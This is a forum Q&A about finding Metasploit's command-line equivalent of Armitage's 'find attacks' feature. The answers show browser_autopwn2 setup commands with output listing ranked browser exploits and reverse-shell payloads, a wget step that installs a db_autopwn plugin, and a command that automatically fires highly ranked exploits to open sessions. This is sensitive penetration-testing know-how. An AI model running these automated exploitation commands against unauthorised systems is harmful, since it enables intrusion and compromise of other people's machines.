armitage find attack tool cli equivalent command

Question

Ive been using metasploit through the cli and a little through armitage. The tool in armitage to find attacks that gives you attacks that are more likely to work is quite useful, so i was wondering what is the cli command to run that if there is one.

If it doesnt exist what is the best way to filter through the modules and find what the best possible attacks are. Obviously I use search and filter based on service, OS etc.. but dont have a way of knowing which module would be the best suited compared to others.

Answer 1

There used to be an autopwn option in Metasploit which would do what you are looking for but only target browsers. However, just like the name in Armitage implies, it selects a large set of exploits, fire it at the target and hope for the best. However, exploitation if not done correctly can do more harm than good. For example, an SMB exploit which has a wrong target selected can crash the SMB service which require manual restart of the machine in order to fix. It means not only will the person attacking the machine won't get a session but it can be easily detected as well. Based upon these concerns, the autopwn functionality has been deprecated. Metasploit now has the AutoPwn2 module which targets only browser based exploits but in a lot smarter way. This is better in the sense that exploits are only fired if the target is fingerprinted correctly and then modules are fired based upon their ranks which means more reliable exploits are attempted first. This way if you are targeting a flash exploit, you don't need to be worried about the architecture and OS details of the connected users and the module will take care of it.

msf > use auxiliary/server/browser_autopwn2
msf auxiliary(browser_autopwn2) > show options

Module options (auxiliary/server/browser_autopwn2):

   Name             Current Setting  Required  Description
   ----             ---------------  --------  -----------
   EXCLUDE_PATTERN                   no        Pattern search to exclude specific modules
   INCLUDE_PATTERN                   no        Pattern search to include specific modules
   Retries          true             no        Allow the browser to retry the module
   SRVHOST          0.0.0.0          yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
   SRVPORT          8080             yes       The local port to listen on.
   SSL              false            no        Negotiate SSL for incoming connections
   SSLCert                           no        Path to a custom SSL certificate (default is randomly generated)
   URIPATH                           no        The URI to use for this exploit (default is random)


Auxiliary action:

   Name       Description
   ----       -----------
   WebServer  Start a bunch of modules and direct clients to appropriate exploits


msf auxiliary(browser_autopwn2) > set URIPATH /
URIPATH => /
msf auxiliary(browser_autopwn2) > run
[*] Auxiliary module execution completed

[*] Searching BES exploits, please wait...
msf auxiliary(browser_autopwn2) > [*] Starting exploit modules...
[*] Starting listeners...
[*] Starting the payload handler...
[*] Starting the payload handler...
[*] Starting the payload handler...
[*] Using URL: http://0.0.0.0:8080/

[*] The following is a list of exploits that BrowserAutoPwn will consider using.
[*] Exploits with the highest ranking and newest will be tried first.

Exploits
========

 Order  Rank       Name                                       Payload
 -----  ----       ----                                       -------
 1      Excellent  firefox_webidl_injection                   firefox/shell_reverse_tcp on 4442
 2      Excellent  firefox_tostring_console_injection         firefox/shell_reverse_tcp on 4442
 3      Excellent  firefox_svg_plugin                         firefox/shell_reverse_tcp on 4442
 4      Excellent  firefox_proto_crmfrequest                  firefox/shell_reverse_tcp on 4442
 5      Excellent  webview_addjavascriptinterface             android/meterpreter/reverse_tcp on 4443
 6      Excellent  samsung_knox_smdm_url                      android/meterpreter/reverse_tcp on 4443
 7      Great      adobe_flash_worker_byte_array_uaf          windows/meterpreter/reverse_tcp on 4444
 8      Great      adobe_flash_domain_memory_uaf              windows/meterpreter/reverse_tcp on 4444
 9      Great      adobe_flash_copy_pixels_to_byte_array      windows/meterpreter/reverse_tcp on 4444
 10     Great      adobe_flash_casi32_int_overflow            windows/meterpreter/reverse_tcp on 4444
 11     Great      adobe_flash_uncompress_zlib_uaf            windows/meterpreter/reverse_tcp on 4444
 12     Great      adobe_flash_shader_job_overflow            windows/meterpreter/reverse_tcp on 4444
 13     Great      adobe_flash_shader_drawing_fill            windows/meterpreter/reverse_tcp on 4444
 14     Great      adobe_flash_pixel_bender_bof               windows/meterpreter/reverse_tcp on 4444
 15     Great      adobe_flash_opaque_background_uaf          windows/meterpreter/reverse_tcp on 4444
 16     Great      adobe_flash_net_connection_confusion       windows/meterpreter/reverse_tcp on 4444
 17     Great      adobe_flash_nellymoser_bof                 windows/meterpreter/reverse_tcp on 4444
 18     Great      adobe_flash_hacking_team_uaf               windows/meterpreter/reverse_tcp on 4444
 19     Good       wellintech_kingscada_kxclientdownload      windows/meterpreter/reverse_tcp on 4444
 20     Good       ms14_064_ole_code_execution                windows/meterpreter/reverse_tcp on 4444
 21     Good       adobe_flash_uncompress_zlib_uninitialized  windows/meterpreter/reverse_tcp on 4444

[+] Please use the following URL for the browser attack:
[+] BrowserAutoPwn URL: http://x.x.x.x:8080/
[*] Server started.

Answer 2

Having a look at the Armitage code for Find Attacks it seems to implement it's own version of an old option in Metasploit db_autopwn that had been deprecated back in 2011.

However, I have found a "recently" updated plugin (Aug 2017) for this option which can be found here: metasploit-db_autopwn

To install, navigate to Metasploits plugin directory (in Kali: /usr/share/metasploit-framework/plugins/)

Then download the plugin:

wget https://raw.githubusercontent.com/hahwul/metasploit-db_autopwn/master/db_autopwn.rb

Start up Metasploit and then load the plugin:

msf > load db_autopwn

You can check the options with db_autopwn -h

Scan and load hosts in to your database as you usually would using db_nmap.

If you would like to scan & run exploits that have the rank of "great" automatically opening sessions, you can run:

msf > db_autopwn -p -R great -e -q

Answer 3

Msfconsole has a search command. If you try first with search -h you will have the valid syntax, with the search module you will have options to find by cve, title, platform name etc. If you need to filter, use the tab key in the same way you use it in linux console. It will display the auto complete options.

This road is much more manual than the armitage search function, but if you spend the time to find those attack by yourself it will give you real skills , further than press the find attacks button in armitage. Here is the metaspoit db tutorial, in this guide you will find how to start the db manually, how to import scans from other tools, etc.

As a matter of fact, the exploitation phase will depend directly from the information gathering phase, so don't limit the joy of exploitation to the automatic tool to do the job for you. They are plenty of exploits out that are not included in metasploit/armitage and you will need to find it "out there", always its a good idea to look in famous places like exploit database always read a exploit and understand what it do, and how before use it, you can harm yourself or others

With all that said, good hunting.

https://www.offensive-security.com/metasploit-unleashed/using-databases/